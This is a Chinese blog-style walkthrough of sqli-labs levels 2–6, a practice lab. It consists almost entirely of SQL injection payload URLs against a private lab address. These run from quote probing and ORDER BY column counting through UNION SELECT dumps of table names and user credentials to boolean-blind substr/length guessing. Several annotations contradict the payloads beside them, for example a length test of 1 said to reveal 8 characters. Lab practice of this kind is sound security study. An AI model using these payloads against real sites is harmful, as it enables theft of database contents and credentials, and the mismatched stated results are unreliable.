SQL闯关2-6关相应代码

文章目录

• 前言
• 一、sql数据库结构
• 二、sql第2关代码
• 三、sql第3关代码
• 四、sql第4关代码
• 五、sql第5关代码
• 六、sql第6关代码
• 总结

---

前言

由于SQL闯关中的2-4关思路和想法基本上与SQL的第1关相似，而SQL闯关中的5-6关思路和想法基本上与SQL的第8关相似，这里笔者只是将用到的URL地址写在了下面，因为套路一样就不过多赘述。要是读者遇见自己看不懂的地方可以参考我之前发的SQL闯关系列文章进行学习。最后希望能给读者带来好的阅读体验。

---

一、sql数据库结构

首先对SQL数据库进行注入时，要了解一下sql的数据库结构。sql数据库主要是1库3表6字段。

1库是information_schema

3表是schemas、tables、columns

6字段分别是schemas下面的schema_name。tables下面的table_name、table_schema。columns下面的table_name、table_schema、column_name

当熟悉上面sql数据库中的1库3表6字段之后，理解下面的代码就简单了不少

---

二、sql第2关代码

http://192.168.182.30/sql/Less-2/?id=1'

http://192.168.182.30/sql/Less-2/?id=1 and 1=1

http://192.168.182.30/sql/Less-2/?id=1 and 1=2判断出是数值型sql注入

http://192.168.182.30/sql/Less-2/?id=1 order by 3%23

http://192.168.182.30/sql/Less-2/?id=1 order by 4%23判断出有三个字段

http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,3

http://192.168.182.30/sql/Less-2/?id=-1 union select 1,database(),version()

http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'这个第二关不需要加注释#

http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from security.users

---

三、sql第3关代码

http://192.168.182.30/sql/Less-3/?id=1')%23

http://192.168.182.30/sql/Less-3/?id=1') and 1=1%23

http://192.168.182.30/sql/Less-3/?id=1') and 1=2%23判断出是字符型

http://192.168.182.30/sql/Less-3/?id=1') order by 3%23

http://192.168.182.30/sql/Less-3/?id=1') order by 4%23判断出是3个字段

http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,3%23

http://192.168.182.30/sql/Less-3/?id=-1') union select 1,database(),version()%23

http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23

http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23

http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users%23

---

四、sql第4关代码

http://192.168.182.30/sql/Less-4/?id=1")%23

http://192.168.182.30/sql/Less-4/?id=1") and 1=1%23

http://192.168.182.30/sql/Less-4/?id=1") and 1=2%23判断出是字符型

http://192.168.182.30/sql/Less-4/?id=1") order by 3%23

http://192.168.182.30/sql/Less-4/?id=1") order by 4%23

http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,3%23

http://192.168.182.30/sql/Less-4/?id=-1") union select 1,database(),version()%23

http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23

http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23

http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users%23

---

五、sql第5关代码

http://192.168.182.30/sql/Less-5/?id=1' and length(database())=1%23判断出库的字符有8个

http://192.168.182.30/sql/Less-5/?id=1' and substr(database(),1,1)='t'%23判断出库的首字母是s

http://192.168.182.30/sql/Less-5/?id=1' and substr(database(),1,1)='t'%23集束炸弹显示库的名字为security

http://192.168.182.30/sql/Less-5/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=5%23判断出库中共有5个表

http://192.168.182.30/sql/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6%23判断出表名的长度为6

http://192.168.182.30/sql/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1) ='r'%23判断出表名为emails

http://192.168.182.30/sql/Less-5/?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = 'users')=3%23

判断出users表中字段数为3

http://192.168.182.30/sql/Less-5/?id=1' and substr((select username from users limit 0,1),1,1)='D'%23

http://192.168.182.30/sql/Less-5/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' limit 0,1),1,1)='e'%23判断出字段名为id

---

六、sql第6关代码 

http://192.168.182.30/sql/Less-6/?id=1"

http://192.168.182.30/sql/Less-6/?id=1" and 1=1%23

http://192.168.182.30/sql/Less-6/?id=1" and 1=2%23判断出是字符型

http://192.168.182.30/sql/Less-6/?id=1" and length(database())=1%23判断出库的字符长度为8个

http://192.168.182.30/sql/Less-6/?id=1" and substr(database(),1,1)='s'%23判断库的首字母是s

http://192.168.182.30/sql/Less-6/?id=1" and substr(database(),1,1)='s'%23判断出库的名security

http://192.168.182.30/sql/Less-6/?id=1" and (select count(table_name) from information_schema.tables where table_schema=database())=5%23判断出共有5个表

http://192.168.182.30/sql/Less-6/?id=1" and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1%23表的字符长度为6

http://192.168.182.30/sql/Less-6/?id=1" and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e'%23

http://192.168.182.30/sql/Less-6/?id=1" and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='emails')=4%23判断出emails表中有2个字段

http://192.168.182.30/sql/Less-6/?id=1" and length((select column_name from information_schema.columns where table_schema=database() limit 0, 1))=4%23判断出字段字符长度为2

http://192.168.182.30/sql/Less-6/?id=1" and substr((select column_name from information_schema.columns where table_schema=database() limit 0, 1),1,1)='e'%23判断出字段为id

---

总结

以上URL地址中的代码仅仅只是列举了我们想要得到的一小部分。如果我们想要得到其他的表和字段的内容仅仅只需要改对应的参数就可以。当然对于5-6关而言需要我们借助Burpsuite来进行辅助抓包和爆破。如果读者有不理解的地方可以参考我之前发表的文章SQL闯关第一关和SQL闯关第八关来结合着看一起学习，效果会更加好。